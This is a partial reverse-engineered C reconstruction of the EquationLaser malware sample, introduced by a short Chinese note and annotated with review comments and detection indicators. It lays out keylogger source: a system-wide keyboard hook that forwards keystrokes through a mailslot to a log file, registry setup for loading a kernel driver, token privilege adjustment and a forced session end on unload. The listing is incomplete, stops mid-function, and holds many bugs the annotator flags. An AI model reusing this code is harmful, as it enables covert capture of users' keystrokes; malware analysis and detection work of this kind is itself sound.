EquationLaser_reversed_partial

EquationLaser是方程式样本中较早的一个,从它所用编程技巧的"古老"程度就可以看出来;当然对于我这种编程经验比较欠缺的爱好者来说,还是值得学习研究一下的。它会收集一些系统信息、记录键盘输入等。资源里本来有一个驱动文件,但样本里的驱动已经被释放出去,数据全为零,所以主要功能应该还没有分析到。

(仅供参考)

#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>

/*
 * Reconstructed module-level state. Names of the form dword_XXXXX / word_XXXXXXXX keep the
 * addresses from the disassembly so this listing can be mapped back to the sample.
 */
WORD MaxUdpDg=0;//word_100509c0 -- filled by _WSAStartup from wsaData.iMaxUdpDg
// Platform/version flags set in NewThread and check_version; dword_6a010 is the "keystroke channel open"
// flag shared between the hook procedure (record) and the collector thread (do_read_mailslot).
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0;	// process-attach reference count, adjusted with Interlocked* in DllMain
// IsExitWinNeeded is only written in DllMain (set to false once the worker thread starts);
// false there means the ExitWindows path runs on process detach.
bool IsDeviceOpen=false,IsExitWinNeeded;
// hDevice: handle to the driver's device (load_driver_get_handle); hHandle: semaphore released in DllMain
// (never assigned in the recovered code); hThread: worker thread; hmod: this DLL's own HINSTANCE,
// passed to SetWindowsHookExA as the hook module so the DLL gets mapped into hooked processes.
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
OSVERSIONINFOA Size;	// filled by GetVersionExA in NewThread; read again by device_io_control_2224d8
HHOOK hhk[3];	// keyboard hook handles installed by set_hook / removed by unset_hook
// Host-local mailslot used as the keystroke channel: do_read_mailslot creates it and copies the path into
// Name, record() writes each keystroke to Name. The fixed name is a useful host artifact for detection.
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076];	// receives the mailslot path (lstrcpynA in do_read_mailslot)
// Function-pointer types for ADVAPI32 entries resolved with GetProcAddress at run time (so they do not
// appear as static imports). The real APIs return BOOL, not bool.
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
					DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
								 PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
// Forward declarations.
// NOTE(review): version_info() is declared and called below, but the definition in this listing is
// named version() -- looks like a transcription mismatch.
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);


/*
 * DLL entry point (everything here runs under the loader lock).
 * DLL_PROCESS_ATTACH: when the OS check passes (version_info()==0) and this is the first attach
 *   (Addend==0), start the worker thread NewThread with a 1 MiB stack, remember our own HINSTANCE in
 *   hmod (later passed to SetWindowsHookExA as the hook module) and bump the attach count.
 * DLL_PROCESS_DETACH: drop the count, close the driver handle, release the semaphore hHandle, sleep
 *   3 s and -- unless IsExitWinNeeded is set -- enable a privilege and call ExitWindows(6,0), i.e. the
 *   sample logs off / reboots the machine when it is unloaded.
 * Returns TRUE in all cases (the early `return true` is taken when thread creation fails; the attach
 * count is then not incremented).
 * NOTE(review): version_info() is declared above but the definition in this listing is named version();
 * hHandle is never assigned anywhere in the recovered code.
 */
BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
	switch(fdwReason)
	{
	case DLL_PROCESS_ATTACH://1
		{
			if(version_info()==0)	// 0 == supported OS version (see version())
			{
				if(Addend==0)	// first process to load the DLL starts the worker thread
				{
					hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0);	// 0x100000 = 1 MiB stack
                    if(hThread!=NULL)
					{
						IsExitWinNeeded=false;	// thread started: the DETACH path below will reach ExitWindows
					}
					else
					{
						return true;	// thread creation failed: stay loaded, but do not count this attach
					}
				}
				hmod=hinstDLL;	// hook module for SetWindowsHookExA (set_hook)
				InterlockedIncrement(&Addend);
			}
			break;
		}
		/*
	case DLL_THREAD_ATTACH://2
		{
			break;
		}
	case DLL_THREAD_DETACH://3
		{
			break;
		}
		*/
	case DLL_PROCESS_DETACH://0
		{
			//
			if(version_info()==0)
			{
				InterlockedDecrement(&Addend);
				if(Addend==0)	// last process detaching
				{
					//sub_1000f7fb -- called here in the sample, not recovered in this listing
				}
				if(IsDeviceOpen!=false)
				{
					if(hDevice!=INVALID_HANDLE_VALUE)
					{
						CloseHandle(hDevice);
					}
					else
					{
						// NOTE(review): the handle is nulled and the flag cleared only when it was already
						// invalid; closing and clearing look swapped -- confirm against the disassembly.
						hDevice=NULL;
						IsDeviceOpen=false;
					}
				}
				ReleaseSemaphore(hHandle,7,0);	// wake up to 7 waiters; hHandle is never initialised in this listing
				Sleep(0xbb8);	// 3000 ms
				if(IsExitWinNeeded==false)
				{
					ShutdownPrivilege();	// enables the privilege ExitWindowsEx needs (see the note there)
					// In winuser.h ExitWindows(a,b) is a macro for ExitWindowsEx(EWX_LOGOFF,0xFFFFFFFF) and ignores
					// both arguments; if the disassembly shows ExitWindowsEx(6,0), 6 = EWX_REBOOT|EWX_FORCE (forced
					// reboot). Either way the session ends when the DLL unloads.
					ExitWindows(6,0);
				}
			}
			break;
		}
	}
	return TRUE;
}

/*
 * OS version gate. Returns 0 when the OS is acceptable, 1 otherwise, based on GetVersion():
 *  - bit 31 clear (Windows NT family): accepted when major > 3, or major == 3 and minor >= 50 (0x32),
 *    i.e. NT 3.5 and later;
 *  - bit 31 set (Win32s / Windows 9x encoding): accepted when major >= 4.
 * dwBuild is extracted but not used.
 * NOTE(review): DllMain calls this as version_info(); the name here is version().
 */
int version()
{
	DWORD dwVersion=0;
	DWORD dwMajorVersion=0;
	DWORD dwMiniorVersion=0;	// (sic) minor version
	DWORD dwBuild=0;

	dwVersion=GetVersion();
   // printf("dwVersion:%8x\n",dwVersion);
	//get windows version: low byte = major, next byte = minor, high word = build (NT) / platform bit
	dwMajorVersion=(DWORD)(LOBYTE(LOWORD(dwVersion)));
	dwMiniorVersion=(DWORD)(HIBYTE(LOWORD(dwVersion)));
	dwBuild=(DWORD)(HIWORD(dwVersion));
    //printf("Version is %d.%d (%d)\n",dwMajorVersion,dwMiniorVersion,dwBuild);
	if(dwVersion<0x80000000)	// high bit clear => Windows NT platform
	{
		if(dwMajorVersion==3)
		{
			if(dwMiniorVersion>=0x32)	// NT 3.50 or later
			{
				return 0;
			}
			else
			{
				return 1;
			}
		}
		else
		{
			return 0;
		}
	}
	else	// high bit set => Win32s or Windows 9x
	{
		if(dwMajorVersion>=4)
		{
			return 0;
		}
		else
		{
			return 1;
		}
	}
}

/*
 * Worker thread started from DllMain (para unused). Suppresses error dialogs, fills the global Size via
 * GetVersionExA and derives platform flags, then on NT waits until the Service Control Manager can be
 * opened. The rest of the routine was not recovered (empty comment block). Always returns 0.
 */
unsigned int _stdcall NewThread(LPVOID para)
{
	//
	SetThreadPriority(GetCurrentThread(),0);	// 0 = THREAD_PRIORITY_NORMAL
	// 0x8003 = SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX: no user-visible
	// error boxes if something fails inside the hooked process.
	SetErrorMode(0x8003);
    Size.dwOSVersionInfoSize=0x94;	// 0x94 = sizeof(OSVERSIONINFOA)
	if(GetVersionExA(&Size)==1)	// BOOL compared to exactly 1 -- works in practice, fragile
	{
		// NOTE(review): dwOSVersionInfoSize was set to 0x94 above and GetVersionExA leaves it alone, so this
		// compare can never be true; the sample presumably tests dwPlatformId == 2 (VER_PLATFORM_WIN32_NT) -- confirm.
		if(Size.dwOSVersionInfoSize==2)
		{
			dword_1f74c=1;	// "is NT" flag (gates the SCM wait below and the mailslot ACL in do_read_mailslot)
			if(Size.dwMajorVersion==5)
			{
		    	dword_1f750=1;	// NT 5.x (Windows 2000 / XP)
			}
		}
        else
		{
			if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a))	// 4.90 = Windows Me
			{
				dword_1f754=1;
				dword_1f74c=1;
			}
			else
			{
				dword_1f754=0;
			}
		}
	}
    if(dword_1f74c==1)
	{
		// OpenServiceManager only returns 0 as written, so this early exit is dead in the reconstruction.
		if(OpenServiceManager()!=0)
		{
			return 0;
		}
	}
	/*
	   remainder of the thread body not recovered

   */
	return 0;
}

/*
 * Waits for the Service Control Manager to become reachable: tries OpenSCManagerA with
 * SC_MANAGER_ALL_ACCESS (0xf003f) and, on failure, sleeps 60 s (0xea60 ms) and recurses. Always returns 0.
 * NOTE(review): OpenSCManagerA returns NULL (not INVALID_HANDLE_VALUE) on failure, so as transcribed the
 * retry never fires and CloseServiceHandle may be called on NULL; the recursion also has no depth bound and
 * the handle obtained in the recursive call is the one that gets closed there -- confirm against the sample.
 */
int OpenServiceManager()
{
	SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
	sc_handle=OpenSCManagerA(0,0,0xf003f);	// local machine, active database, SC_MANAGER_ALL_ACCESS
	if(sc_handle==INVALID_HANDLE_VALUE)
	{
		Sleep(0xea60);	// 60000 ms
		OpenServiceManager();
	}
	CloseServiceHandle(sc_handle);
	return 0;
}

/*
 * In-place string decoder used by the sample. Starting from the fixed seed (a=0x9ea6, b=0x4f53, c=7),
 * each byte is XORed with the current key `a` shifted right by `shift`; the shift for the NEXT byte is
 * taken from the low three bits of the still-encoded current byte, and compute_seed() advances the key
 * state before every byte. `length` counts bytes and is decremented to zero (the loop runs while it is
 * non-zero, exactly like the original).
 */
void decode(char *string,int length)
{
	int key=0x9ea6,mix=0x4f53,carry=0x7;
	int shift=3;	// initial shift applied to the first byte

	for(int pos=0;length!=0;pos++,length--)
	{
		compute_seed(&key,&mix,&carry);
		int next_shift=string[pos]&7;	// derived from the encoded byte, before it is rewritten
		string[pos]^=key>>shift;
		shift=next_shift;
	}
}

/*
 * Advances the decoder key state (a, b, c) by one step:
 *   rot = a*8 | a>>13      (a 16-bit rotate-left-by-3 of `a`, as the sample does it)
 *   a  ^= b
 *   b   = c ^ (rot & 0xfff8)
 *   c   = rot & 7
 * With the seeds used by decode() every value stays within 16 bits, so the arithmetic never overflows.
 * Writes happen in the same order as the original (a, then b, then c).
 */
void compute_seed(int *a,int *b,int *c)
{
	const int rot=(8*(*a))|((*a)>>13);
	const int high_bits=rot&0xfff8;
	const int low_bits=rot&7;

	*a^=*b;
	*b=(*c)^high_bits;
	*c=low_bits;
}

/*
 * Prepares the service key HKLM\System\CurrentControlSet\Services\Fdisk (KEY_ALL_ACCESS = 0xf003f) with
 * Type=1 (SERVICE_KERNEL_DRIVER), Start=3 (SERVICE_DEMAND_START) and ErrorControl=0 (SERVICE_ERROR_IGNORE):
 * the minimal registry state a kernel driver needs before it can be loaded on demand (see the NtLoadDriver
 * note in load_driver_get_handle). Returns 1 when all three values were written, 0 otherwise.
 * No ImagePath is written here, so the driver image is presumably located by default name or set elsewhere
 * -- confirm. The "Fdisk" service key is the registry artifact to look for on a suspected host.
 * NOTE(review): `Class` is passed to RegCreateKeyExA uninitialised (UB); `RegSetValueEx` is the TCHAR macro
 * while the rest of the listing uses the A variants.
 */
int GetRegkeyReady()
{
	char *Class;	// NOTE(review): never initialised; lpClass should be NULL or a valid string
	int finished=0;
	DWORD dwDisposition,data;
	HKEY hkResult;
	if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
		0,&hkResult,&dwDisposition)==0)	// 0 == ERROR_SUCCESS
	{
		data=1;	// SERVICE_KERNEL_DRIVER
		if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)	// 4 == REG_DWORD, 4 bytes
		{
			data=3;	// SERVICE_DEMAND_START
			if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
			{
				data=0;	// SERVICE_ERROR_IGNORE
				if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
				{
					finished=1;
				}
			}
		}
		RegCloseKey(hkResult);
	}
	return finished;
}

/*
 * Opens the driver's device object and stores the handle in the global hDevice; returns true on success.
 * 0xc0000000 = GENERIC_READ|GENERIC_WRITE, 3 = OPEN_EXISTING, 0x80 = FILE_ATTRIBUTE_NORMAL.
 * The comment block lists the steps the sample takes before this call (privilege, NtLoadDriver on the
 * Fdisk service key written by GetRegkeyReady); they are not reconstructed in this listing.
 * NOTE(review): the C literal "\\.\fdisk0" is '\' '.' <form feed> "disk0"; the intended device path is
 * presumably \\.\fdisk0, which has to be spelled "\\\\.\\fdisk0" in C -- confirm against the sample.
 */
bool load_driver_get_handle()
{
	/*
	1,get load driver privilege
	2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
	3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
	*/
	hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
	return hDevice==INVALID_HANDLE_VALUE?0:1;
}

/*
 * Sends IOCTL 0x2224d8 to the driver (no input or output buffer), only on the NT platform.
 * Decoding the code: device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x936, METHOD_BUFFERED,
 * FILE_ANY_ACCESS. Returns false when there is no device handle or DeviceIoControl fails.
 * NOTE(review): there is no return on the success path nor on non-NT -- the function falls off the end of
 * a bool function (UB); presumably `return true` was intended. What the driver does for this code is not
 * recoverable here (the driver body in the sample was zeroed).
 */
bool device_io_control_2224d8()
{
	DWORD ByteReturned=0;
	if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)	// Size filled by GetVersionExA in NewThread
	{
		if(hDevice!=INVALID_HANDLE_VALUE)
		{
			if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))
			{
				return false;
			}
		}
		else
		{
			return false;
		}
	}
}

/*
 * Hardware fingerprinting helper. The recovered body is only the inline assembly quoted below: it reads a
 * PCI configuration-space register through the legacy I/O ports 0xCF8 (CONFIG_ADDRESS) and 0xCFC
 * (CONFIG_DATA): save the current CONFIG_ADDRESS, write `address` with its low two bits cleared, read the
 * dword at port 0xCFC + (address & 3), restore the saved CONFIG_ADDRESS and return the value read (eax = num1).
 * IN/OUT are privileged instructions; from user mode this only works with I/O privilege, presumably
 * obtained through the driver -- cannot tell from this listing.
 * NOTE(review): as transcribed the C function has no statements and no return value (UB if called).
 */
DWORD get_hardware_info(DWORD address)//get some hardware information
{
	DWORD num1,num2,num3;	// num1: value read; num2: saved CONFIG_ADDRESS; num3 unused
	/*
		mov dx,0cf8h
		in  eax,dx
		mov num2,eax
		mov ecx,address
		mov num1,0cf8h
		mov eax,ecx
		and al,0fch
		mov address,eax
		out dx,eax
		and ecx,3
		add ecx,0cfch
		mov address,ecx
		mov dx,address
		in  eax,dx
		mov num1,eax
		mov ecx,num2
		mov num2,0cf8h
		and ecx,0fffffffch
		mov address,ecx
		mov dx,num2
		mov eax,address
		out dx,eax
		;
		mov eax,num1
	*/
}


/*
 * Lazily determines whether the platform is Win32 NT, caching the answer in dword_69f88 and using
 * dword_69f84 as the "already computed" marker. Returns dword_69f88.
 * NOTE(review): several transcription issues make this routine do the opposite of its intent as written:
 *  - GetVersionExA returns nonzero on SUCCESS, yet the nonzero branch shows the error box and exit(2);
 *  - `VER_PLATFORM_WIN32_NT==version_info` compares an int with the whole struct; the sample must be
 *    testing version_info.dwPlatformId;
 *  - the guard `dword_69f84!=0` skips the computation while the flag is still 0 and the body sets it to 1,
 *    so the guard was presumably `==0` (compute once).
 * Confirm each against the disassembly. The visible string "Failed to get Windows version" is a usable
 * static indicator for this component.
 */
bool check_version()//VER_PLATFORM_WIN32_NT
{
	OSVERSIONINFOA version_info;
	version_info.dwOSVersionInfoSize=0x94;	// sizeof(OSVERSIONINFOA)
	if(dword_69f84!=0)
	{
		if(0!=GetVersionExA(&version_info))	// NOTE(review): inverted -- nonzero is success
		{
			MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);
			exit(2);
		}
		else
		{
			if(VER_PLATFORM_WIN32_NT==version_info)	// NOTE(review): should be version_info.dwPlatformId
			{
				dword_69f84=1;
				dword_69f88=1;
			}
			else
			{
				dword_69f88=0;
			}
		}
	}
	return dword_69f88;
}


/*
 * Enables one privilege on the current process token, resolving OpenProcessToken / LookupPrivilegeValue /
 * AdjustTokenPrivileges from ADVAPI32.DLL at run time. The token is opened with 0x28 =
 * TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY and AdjustTokenPrivileges is called with one entry (0x10 =
 * sizeof(TOKEN_PRIVILEGES) for a single LUID). Called from DllMain right before ExitWindows.
 * NOTE(review):
 *  - "SeShutdownDriverPrivilege" is not a Windows privilege name. The function comment says
 *    SeLoadDriverPrivilege and the caller needs SeShutdownPrivilege (for ExitWindowsEx); with an unknown
 *    name LookupPrivilegeValue fails and nothing is enabled -- confirm the string against the sample.
 *  - ADVAPI32 exports LookupPrivilegeValueA/W; GetProcAddress for the undecorated name is expected to fail.
 *  - `handle` is read in the cleanup at the bottom even when it was never assigned (uninitialised if
 *    LoadLibrary or any GetProcAddress fails); `ret` is unused; AdjustTokenPrivileges' result is ignored.
 */
void ShutdownPrivilege()//SeLoadDriverPrivilege
{
	int ret=0;
	HMODULE hObject;
	HANDLE handle;	// NOTE(review): uninitialised; read at the end on every path
	LUID  l_luid={0};
	TOKEN_PRIVILEGES l_token_privilege={0};
    _OpenProcessToken l_OpenProcessToken;
	_LookupPrivilegeValue l_LookupPrivilegeValue;
	_AdjustTokenPrivileges l_AdjustTokenPrivileges;
	hObject=LoadLibrary("ADVAPI32.DLL");
	if(hObject!=NULL)
	{
		l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
		if(l_OpenProcessToken!=0)
		{
			l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");	// see note: A/W suffix
			if(l_LookupPrivilegeValue!=0)
			{
				l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
				if(l_AdjustTokenPrivileges!=0)
				{
					if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true)	// TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
					{
						if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)	// see note: not a real privilege name
						{
							// Privileges is a one-element array; `->` works through array decay.
							l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;
							l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
							l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
                            l_token_privilege.PrivilegeCount=1;
							l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0);	// result not checked
						   	//if(GetLastError()==0)
							//{
							//	if(handle!=NULL)
							//		CloseHandle(handle);
							//	FreeLibrary(hObject);
							//}
						}
					}
				}
			}
		}
	}
	if(handle!=NULL)
		CloseHandle(handle);
	if(hObject!=NULL)
		FreeLibrary(hObject);
}

/*
 * Initialises WinSock at wVersionRequested. Fails (returns 1) when WSAStartup fails, when the negotiated
 * wsaData.wVersion is below the requested one (LOBYTE = major, HIBYTE = minor), or when iMaxSockets is
 * below socket_num. On success records wsaData.iMaxUdpDg in the global MaxUdpDg and returns 0.
 * The `else if` is always true once the first test fails (equal major implies minor >= requested), so the
 * function does not actually fall off the end, though a compiler will warn.
 * iMaxSockets / iMaxUdpDg are WinSock 1.x fields and are to be ignored under WinSock 2 (where they may read
 * as 0), which would make the socket_num check fail there -- which version the sample requests is not
 * visible here. WSACleanup is not called on the failure paths.
 */
int _WSAStartup(WORD wVersionRequested,char socket_num)
{
	WSAData wsaData;
	if(0!=WSAStartup(wVersionRequested,&wsaData))
	{
		return 1;
	}
	// negotiated version lower than requested in either byte
	if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))
	{
		return 1;
	}
	else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))
	{
		if(wsaData.iMaxSockets<socket_num)	// WinSock 1.x field, see header comment
		{
			return 1;
		}
		MaxUdpDg=wsaData.iMaxUdpDg;	// largest UDP datagram the provider reports (WinSock 1.x field)
		return 0;
	}
}

/*
 * Installs (set_or_unset != 0) or removes the keyboard hook while temporarily switched to window station
 * "winsta0" and the desktop named by lpszDesktop, then restores the caller's station and desktop. This is
 * how the hook gets installed on the interactive desktop even when the caller runs in another station
 * (e.g. a service). Returns 1 only when the desktop handle was closed successfully, 0 on any earlier
 * failure. Opening winsta0 with WINSTA_ALL_ACCESS plus SetProcessWindowStation/SetThreadDesktop from a
 * non-interactive process is worth flagging in host telemetry.
 * NOTE(review): lpszDesktop (char *) is reused to hold the HDESK returned by OpenDesktopA -- type confusion
 * in the transcription; unset_hook() is called without the hhook_num argument it takes; set_hook /
 * unset_hook are used before any declaration is visible.
 */
int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
	int      ret=0;
	HWINSTA  hWinSta=NULL;	// caller's window station (restored at the end)
	HWINSTA  hWinSta0=NULL;	// "winsta0", the interactive station
	HDESK    hDesktop=NULL;	// caller's desktop (restored at the end)

	do	// do { ... } while(0) used as a break-to-cleanup block
	{
		hWinSta=GetProcessWindowStation();
		if(hWinSta==NULL)
		{
			ret=0;
			break;
		}
		hDesktop=GetThreadDesktop(GetCurrentThreadId());
		if(hDesktop==NULL)
		{
			ret=0;
			break;
		}
		hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS);
		if(hWinSta0==NULL)
		{
			ret=0;
			break;
		}
		if(false==SetProcessWindowStation(hWinSta0))
		{
			ret=0;
			break;
		}
		lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);	// NOTE(review): HDESK stored in a char *
		if(lpszDesktop==NULL)
		{
			ret=0;
			break;
		}
		if(false==SetThreadDesktop(lpszDesktop))
		{
			ret=0;
			break;
		}
		if(set_or_unset==0)
		{
			unset_hook();	// NOTE(review): unset_hook takes hhook_num
		}
		else
		{
			if(0==set_hook(hhook_num))
			{
				ret=0;
				break;
			}
		}
		// NOTE(review): this mixes failure tests (0==Set*) with the success value of CloseWindowStation;
		// when both Set* calls succeed but CloseWindowStation fails the desktop handle leaks and 0 is
		// returned, and when restoring the station fails the handles are still closed.
		if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))
		{
			ret=CloseDesktop(lpszDesktop)?1:0;
		}
	}while(0);
	return ret;
}

/*
 * Installs a system-wide WH_KEYBOARD hook (dwThreadId = 0) whose procedure fn lives in this DLL (hmod, set in
 * DllMain). Windows maps the hook DLL into every GUI process on the desktop, so fn -> record() sees all
 * keystrokes: this is the keylogger's capture point. The handle is stored in hhk[hhook_num] and 1 is
 * returned when a hook was obtained. A WH_KEYBOARD hook with thread id 0 installed from an unknown DLL is
 * a standard keylogger indicator for EDR / hook-enumeration checks.
 * NOTE(review): InterlockedExchange takes LONG* / LONG; passing HHOOK* / HHOOK is type punning in the
 * transcription. Sleep(0) only yields the time slice.
 */
int set_hook(int hhook_num)//record key stroke
{
	HHOOK hook=NULL;
	Sleep(0);
	hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);	// 0 = all threads on the current desktop
	InterlockedExchange(hhk+hhook_num,hook);
	return hhk[hhook_num]?1:0;
}

/*
 * Removes the keyboard hook stored in hhk[hhook_num] (if any) with UnhookWindowsHookEx and clears the slot.
 * No return value; the unhook result is not checked. Sleep(0) only yields the time slice.
 */
void unset_hook(int hhook_num)
{
	if(hhk[hhook_num]!=NULL)
	{
		Sleep(0);
		UnhookWindowsHookEx(hhk[hhook_num]);
		hhk[hhook_num]=NULL;
	}
}

/*
 * Hook procedure registered by set_hook; runs inside every hooked process and forwards to record().
 * NOTE(review): passes the array hhk (HHOOK *) where record() takes a single HHOOK; presumably the sample
 * passes the installed hook handle (hhk[n]) -- confirm.
 */
LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
	return record(hhk,code,wParam,lParam);
}

/*
 * Keyboard hook body. Always chains to the next hook first, then for HC_ACTION (code == 0) and while the
 * channel flag dword_6a010 is set, writes {current pid, wParam (virtual-key code), lParam (repeat count /
 * scan code / flags)} to the file named by the global Name -- which do_read_mailslot points at the mailslot
 * \\.\mailslot\__MS_1509_ -- so each keystroke in each hooked process is forwarded to the collector thread.
 * Returns the CallNextHookEx result.
 * NOTE(review): `buffer` holds 3 WORDs (6 bytes) but 8 bytes are written, reading 2 bytes past the array,
 * and pid / lParam are truncated to 16 bits -- the sample presumably uses DWORDs; `CallnextHookEx` and
 * `null` are not Win32 identifiers (CallNextHookEx, NULL); when CreateFile fails the flag is cleared but
 * WriteFile is still attempted on INVALID_HANDLE_VALUE; when WriteFile fails the file handle is leaked.
 */
int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
	HANDLE file=INVALID_HANDLE_VALUE;
	DWORD NumberOfBytesWritten=0;
	WORD buffer[3]={0};	// NOTE(review): 6 bytes, but 8 are written below
	LONG result=0;

	result=CallnextHookEx(hhk,code,wParam,lParam);	// keep the hook chain working so nothing looks broken
	if(code==0)	// HC_ACTION
	{
		if(dword_6a010!=0)	// collector is listening (set/cleared by do_read_mailslot)
		{
			buffer[0]=GetCurrentProcessId();	// truncated to WORD as transcribed
			buffer[1]=wParam;	// virtual-key code
			buffer[2]=lParam;    //0X40000000       1                       3    -- repeat/scan/extended/alt/transition bits, truncated
			file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);	// Name = mailslot path
			if(INVALID_HANDLE_VALUE==file)
			{
				dword_6a010=0;	// channel gone: stop trying until the collector resets the flag
			}
			if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))	// NOTE(review): still called when file is invalid
			{
				CloseHandle(file);
				dword_6a010=1;
			}
		}
	}
	return result;
}

/*
 * Collector thread for the keylogger. lParam points at a configuration block: the log file path at offset
 * 0x2c0 and a DWORD size limit at offset 0x2bc (offsets as recovered; layout otherwise unknown).
 *  1. Open/append the log file; if it already exceeds the limit, clean up and end the thread with code 1.
 *  2. Create the mailslot \\.\mailslot\__MS_1509_ (path copied into the global Name that record() writes to).
 *  3. On NT (dword_1f74c) resolve SetSecurityInfo from advapi32.dll and set the mailslot's security: the
 *     SecurityInfo argument is spelled PROCESS_SET_SESSIONID (0x4), which is numerically
 *     DACL_SECURITY_INFORMATION; with pDacl == NULL the object gets a NULL DACL, i.e. any process -- hooked
 *     processes running as other users included -- can write to it. Confirm against the sample.
 *  4. Loop: read up to 0x50 bytes from the mailslot (read_mailslot, not in this listing), append them to
 *     the log, sleep 250 ms (0xfa); clear dword_6a010 (stop) when a read fails or the limit is reached,
 *     then close both handles and clean up.
 * Returns 0 on the paths that return at all.
 * NOTE(review): ERROR_SUCCESSW is not a Win32 identifier (ERROR_SUCCESS); Clean_hook_and_key and
 * clean_hook_and_key differ in case; WriteFile with lpNumberOfBytesWritten == NULL and lpOverlapped == NULL
 * is invalid per the API contract; the limit test inside the loop compares a single read's length rather
 * than the accumulated bytes_num -- probably a transcription slip; when the mailslot is created but the
 * advapi32 lookup / SetSecurityInfo fails, or on non-NT, the function falls off the end without a return
 * and without closing hObject/hMailslot; arithmetic on (PVOID) is a compiler extension.
 */
DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
	char buffer[0x50];
	DWORD bytes_num=0,nNumberOfBytesToWrite;	// bytes_num: current log size; nNumberOfBytesToWrite: last read length
	HANDLE hObject=INVALID_HANDLE_VALUE; 	// log file
	HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
	HMODULE hModule=INVALID_HANDLE_VALUE;
	_SetSecurityInfo l_SetSecurityInfo=NULL;

	hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);	// log path from the config block
    if(INVALID_HANDLE_VALUE!=hObject)
	{
		bytes_num=SetFilePointer(hObject,0,NULL,FILE_END);	// seek to end: existing log size
		if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc))	// log already over the configured limit
		{
			CloseHandle(hObject);
			Clean_hook_and_key(lParam);
			_endthreadex(1);
			return 0;
		}
		lstrcpynA(Name,mailslot_name,0x103);	// publish the channel path for record()
		hMailslot=CreateMailslotA(Name,0,0,NULL);	// no max message size, no read timeout
		if(INVALID_HANDLE_VALUE==hMailslot)
		{
			CloseHandle(hObject);
			clean_hook_and_key(lParam);
			_endthreadex(1);
		}
		if(0!=dword_1f74c)	// NT only: objects have DACLs
		{
			hModule=LoadLibraryA("advapi32.dll");
			if(hModule)
			{
				l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
				if(NULL!=l_SetSecurityInfo)
